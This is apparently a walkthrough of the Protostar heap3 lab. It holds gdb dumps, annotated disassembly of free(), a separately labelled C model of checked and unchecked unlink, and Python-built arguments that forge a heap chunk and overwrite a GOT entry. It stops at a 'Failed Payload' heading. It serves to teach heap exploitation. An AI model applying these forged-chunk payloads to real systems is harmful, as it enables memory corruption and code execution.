0x804984d <free+41>:    mov    DWORD PTR [ebp-0x30],eax
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x29     41
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
0x0804984a      3599    in common/malloc.c

Yes. chunk size 😀 Continue

0x804984a <free+38>:    and    eax,0xfffffffc

AND eax with fffffffc

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804984d <free+41>:    mov    DWORD PTR [ebp-0x30],eax
0x8049850 <free+44>:    mov    eax,DWORD PTR [ebp-0x38]
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x28     40
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
0x0804984d      3599    in common/malloc.c

Store eax back at ebp-0x30.

(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049850 <free+44>:    mov    eax,DWORD PTR [ebp-0x38]
0x8049853 <free+47>:    mov    eax,DWORD PTR [eax]
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x00000028      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x28     40
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
3608    in common/malloc.c

So we can see the chunk size and the chunk start being saved on the stack. I'd like you to keep going like this on your own; I won't show the rest here.

0x8049850 <free+44>: mov eax,DWORD PTR [ebp-0x38]   ; loads the value at [ebp-0x38] into eax
0x8049853 <free+47>: mov eax,DWORD PTR [eax]        ; loads into eax the value that eax points to

(gdb) x 0x804b160
0x804b160 <av_>: 0x00000049

0x8049855 <free+49>: cmp eax,DWORD PTR [ebp-0x30]   ; compares it with the chunk size saved earlier

0x49 is the max bin chunk size.

With this method you can also go back and study how malloc lays out its chunks.

Ref

https://thesprawl.org/research/exploit-exercises-protostar-heap/#heap-3

Unlinking

0x8049899 <free+117>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x804989c <free+120>:   mov    eax,DWORD PTR [eax+0x4]  ; chunk_size_flags
0x804989f <free+123>:   and    eax,0x2                  ; IS_MMAPPED
0x80498a2 <free+126>:   test   eax,eax                  ; check flag
0x80498a4 <free+128>:   jne    0x8049a2c <free+520>     ; jump if the flag is set
;------------------------------------------------------------------------------
0x80498aa <free+134>:   mov    eax,DWORD PTR [ebp-0x30] ; chunk_size
0x80498ad <free+137>:   mov    edx,DWORD PTR [ebp-0x34] ; chunk
0x80498b0 <free+140>:   lea    eax,[edx+eax*1]          ; next_chunk
0x80498b3 <free+143>:   mov    DWORD PTR [ebp-0x28],eax ; store next_chunk
0x80498b6 <free+146>:   mov    eax,DWORD PTR [ebp-0x28]
0x80498b9 <free+149>:   mov    eax,DWORD PTR [eax+0x4]  ; next_chunk_size_flags
0x80498bc <free+152>:   and    eax,0xfffffffc           ; zero last two flag bits
0x80498bf <free+155>:   mov    DWORD PTR [ebp-0x24],eax ; next_chunk_size
;------------------------------------------------------------------------------
0x80498c2 <free+158>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x80498c5 <free+161>:   mov    eax,DWORD PTR [eax+0x4]  ; chunk_size
0x80498c8 <free+164>:   and    eax,0x1                  ; PREV_INUSE flag
0x80498cb <free+167>:   test   eax,eax                  ; check the flag
0x80498cd <free+169>:   jne    0x8049909 <free+229>     ; jump if the flag is set

His explanation is good. If PREV_INUSE is set, it jumps to free+229.

0x80498cf <free+171>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x80498d2 <free+174>:   mov    eax,DWORD PTR [eax]      ; prev_chunk_size
0x80498d4 <free+176>:   mov    DWORD PTR [ebp-0x1c],eax
0x80498d7 <free+179>:   mov    eax,DWORD PTR [ebp-0x1c]
0x80498da <free+182>:   add    DWORD PTR [ebp-0x30],eax ; chunk_size
0x80498dd <free+185>:   mov    eax,DWORD PTR [ebp-0x1c]
0x80498e0 <free+188>:   neg    eax                      ; -prev_chunk_size
0x80498e2 <free+190>:   add    DWORD PTR [ebp-0x34],eax ; prev_chunk = 
                                                        ; chunk+(-prev_chunk_size)
0x80498e5 <free+193>:   mov    eax,DWORD PTR [ebp-0x34] ; store prev_chunk
0x80498e8 <free+196>:   mov    eax,DWORD PTR [eax+0x8]  ; prev_chunk->fd
0x80498eb <free+199>:   mov    DWORD PTR [ebp-0x14],eax 
0x80498ee <free+202>:   mov    eax,DWORD PTR [ebp-0x34]
0x80498f1 <free+205>:   mov    eax,DWORD PTR [eax+0xc]  ; prev_chunk->bk
0x80498f4 <free+208>:   mov    DWORD PTR [ebp-0x18],eax

0x80498f7 <free+211>:   mov    eax,DWORD PTR [ebp-0x14] ; FD
0x80498fa <free+214>:   mov    edx,DWORD PTR [ebp-0x18] ; BK
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx  ; FD->bk = BK
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18] ; BK
0x8049903 <free+223>:   mov    edx,DWORD PTR [ebp-0x14] ; FD
0x8049906 <free+226>:   mov    DWORD PTR [eax+0x8],edx  ; BK->fd = FD

If it jumps there, the unlink won't run. Only when we make prev_inuse unset does the unlink happen.

So now it's clearer than before.
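The unlink from free+211..226 and the flag conditions from free+117..169, as an added C example (not code from the original post or from glibc): a constructed 32-bit chunk struct, the unchecked FD->bk = BK / BK->fd = FD write that a forged fd/bk pair turns into a write outside the heap, and the "corrupted double-linked list" check that later glibc versions perform before writing, which rejects the same forged chunk. Every name here (chunk_t, unlink_checked, reaches_backward_unlink) is this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for the 32-bit malloc_chunk header seen in the
   dumps: prev_size @0, size @+4, fd @+8, bk @+12. Constructed for this
   example; it is not glibc's own definition. */
typedef struct chunk {
    uint32_t prev_size;
    uint32_t size;
    struct chunk *fd;
    struct chunk *bk;
} chunk_t;

#define PREV_INUSE 0x1u
#define IS_MMAPPED 0x2u

/* Mirrors free+117..169: free() only walks into the backward
   coalesce/unlink path when IS_MMAPPED is clear and PREV_INUSE is clear,
   which is why a forged size field has to end in binary 00. */
int reaches_backward_unlink(uint32_t size_field)
{
    if (size_field & IS_MMAPPED)
        return 0;
    return (size_field & PREV_INUSE) == 0;
}

/* The unlink from free+211..226 exactly as listed: FD->bk = BK, BK->fd = FD,
   with no check that FD and BK really belong to this list. */
static void unlink_unchecked(chunk_t *p)
{
    chunk_t *fd = p->fd;
    chunk_t *bk = p->bk;
    fd->bk = bk;   /* writes BK at FD+12 */
    bk->fd = fd;   /* writes FD at BK+8  */
}

/* The mitigation later glibc added ("corrupted double-linked list"):
   both neighbours must point back at p before anything is written.
   Returns 0 on success, -1 when the chunk is rejected. */
static int unlink_checked(chunk_t *p)
{
    chunk_t *fd = p->fd;
    chunk_t *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Constructed bin: head <-> a <-> b (circular). Unlinking a through the
   checked path must leave head <-> b. Returns 1 on success. */
int valid_bin_unlink(void)
{
    chunk_t head = {0}, a = {0}, b = {0};
    head.fd = &a; head.bk = &b;
    a.fd = &b;    a.bk = &head;
    b.fd = &head; b.bk = &a;
    if (unlink_checked(&a) != 0)
        return 0;
    return head.fd == &b && b.bk == &head;
}

/* Constructed forged chunk whose fd/bk were overwritten (the 0x0804b11c /
   0x0804c008 pair in the dump plays this role). `target` stands in for the
   memory at FD, `value` for the address at BK. Returns 1 if the unchecked
   unlink wrote BK into target.bk and FD into value.fd, i.e. a write to
   memory the allocator never owned. */
int forged_unlink_unchecked(void)
{
    chunk_t target = {0}, value = {0}, forged = {0};
    forged.fd = &target;
    forged.bk = &value;
    unlink_unchecked(&forged);
    return target.bk == &value && value.fd == &target;
}

/* Same forged chunk through the hardened unlink: rejected, memory untouched. */
int forged_unlink_checked(void)
{
    chunk_t target = {0}, value = {0}, forged = {0};
    forged.fd = &target;
    forged.bk = &value;
    int rc = unlink_checked(&forged);
    return rc == -1 && target.bk == NULL && value.fd == NULL;
}

int main(void)
{
    printf("size 0x29 -> unlink path: %d\n", reaches_backward_unlink(0x29));
    printf("size 0xf0 -> unlink path: %d\n", reaches_backward_unlink(0xf0));
    printf("valid bin unlink ok:       %d\n", valid_bin_unlink());
    printf("forged, unchecked, wrote:  %d\n", forged_unlink_unchecked());
    printf("forged, checked, rejected: %d\n", forged_unlink_checked());
    return 0;
}
```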

Let's try it again.

(gdb) run AAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCC CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCC CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x43434343      0x00000000      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x2597100d      0x0fd6461d      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      in heap3/heap3.c

OK, so now we overflow the chunk size again.

Right: the chunk size has to be bigger than 64 bytes. We just saw that it gets compared against that.

The other thing: the lowest 2 bits must be 00.

Values such as 0xF0 or 0xB0 can be used.

(gdb) r AAAA `python -c 'print "B"*32+"CCCC\xf0"'` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c 'print "B"*32+"CCCC\xf0"'` CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x43434343      0x000000f0      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x55d35a6d      0x7f920c7d      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      in heap3/heap3.c

So, as was said further up, if we don't want null bytes in the fake chunk we have to go back to using a negative value.

(gdb) r AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x2f0da0f1      0x054cf6e1      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      in heap3/heap3.c

Right, now let free run.

(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18]
0xbffffc10:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc20:     0x0804b160      0x0804c054      0x000000ec      0x00000000
0xbffffc30:     0x0804c140      0x00000000      0x00000000      0xfffffffc
0xbffffc40:     0x00000000      0x00000000      0x00000f89      0xb7f09de0
0xbffffc50:     0x00000000      0x00000000      0xbffffc88      0x08048916
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
eax            0x0      0
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x0      0
0x080498fd in free (mem=0x804c058) at common/malloc.c:3638
3638    common/malloc.c: No such file or directory.
        in common/malloc.c

The segmentation fault only happens now, so the unlink has run. Next we need to find FD and BK.

(gdb) r AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCCDDDDEEEEFFFF
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCCDDDDEEEEFFFF
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x44444444
0x804c060:      0x45454545      0x46464646      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe85      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x1182cc38      0x3bc39a28      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x11     17

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c
(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x44444444
0x804c060:      0x45454545      0x46464646      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18]
0xbffffc10:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc20:     0x0804b160      0x0804c054      0x000000ec      0x00000000
0xbffffc30:     0x0804c140      0x00000000      0x00000000      0xfffffffc
0xbffffc40:     0x45454545      0x44444444      0x00000f89      0xb7f09de0
0xbffffc50:     0x00000000      0x00000000      0xbffffc88      0x08048916
0xbffffc60:     0x0804c058      0xbffffe85      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
eax            0x44444444       1145324612
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x45454545       1162167621
0x080498fd in free (mem=0x804c058) at common/malloc.c:3638
3638    common/malloc.c: No such file or directory.
        in common/malloc.c

0x44444444 is BK

0x45454545 is FD

Now put in the GOT and heap addresses worked out above.

(gdb) r `python -c 'print "A"*32'` `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap3 `python -c 'print "A"*32'` `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x41414141      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x0804b11c
0x804c060:      0x0804c008      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    0x18(%esp),%eax
0xbffffc40:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc68
0xbffffc50:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc60:     0x0804ab50      0x00000000      0xbffffce8      0xb7eadc76
0xbffffc70:     0x00000004      0xbffffd14      0xbffffd28      0xb7fe1848
0xbffffc80:     0xbffffcd0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffc90:     0x00000001      0xbffffcd0      0xb7ff0626      0xb7fffab0
0xbffffca0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcb0:     0xbffffce8      0x35b9df9a      0x1ff9498a      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xd      13

Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffffd14) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c
(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x0804b11c      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x0804b11c
0x804c060:      0x0804c008      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049951 <free+301>:   mov    %edx,0xc(%eax)
0x8049954 <free+304>:   mov    -0x18(%ebp),%eax
0xbffffbf0:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc00:     0x0804b160      0x0804c054      0x000000ec      0x00000000
0xbffffc10:     0x0804c140      0x00000000      0x00000000      0xfffffffc
0xbffffc20:     0x00000000      0x00000000      0x00000f89      0xb7f09de0
0xbffffc30:     0x00000000      0x00000000      0xbffffc68      0x08048916
0xbffffc40:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc68
0xbffffc50:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc60:     0x0804ab50      0x00000000      0xbffffce8      0xb7eadc76
eax            0x0      0
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x0      0
0x08049951 in free (mem=0x804c058) at common/malloc.c:3648
3648    common/malloc.c: No such file or directory.
        in common/malloc.c
(gdb) x/12x 0x0804c008-8
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x0804b11c      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029
(gdb) x/x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x0804c008

Overwriting the GOT works now, but it still isn't enough; the fault is still happening.

There is a PREV_INUSE check. We have to get past it.

0x8049933 <free+271>:   cmp    DWORD PTR [ebp-0x20],0x0 ; check PREV_INUSE
0x8049937 <free+275>:   jne    0x8049963 <free+319>     ; jump if the flag is set

So we add another fake chunk between chunk A and chunk B. That was already mentioned above; when I tried it back then it didn't work.

Failed Payload

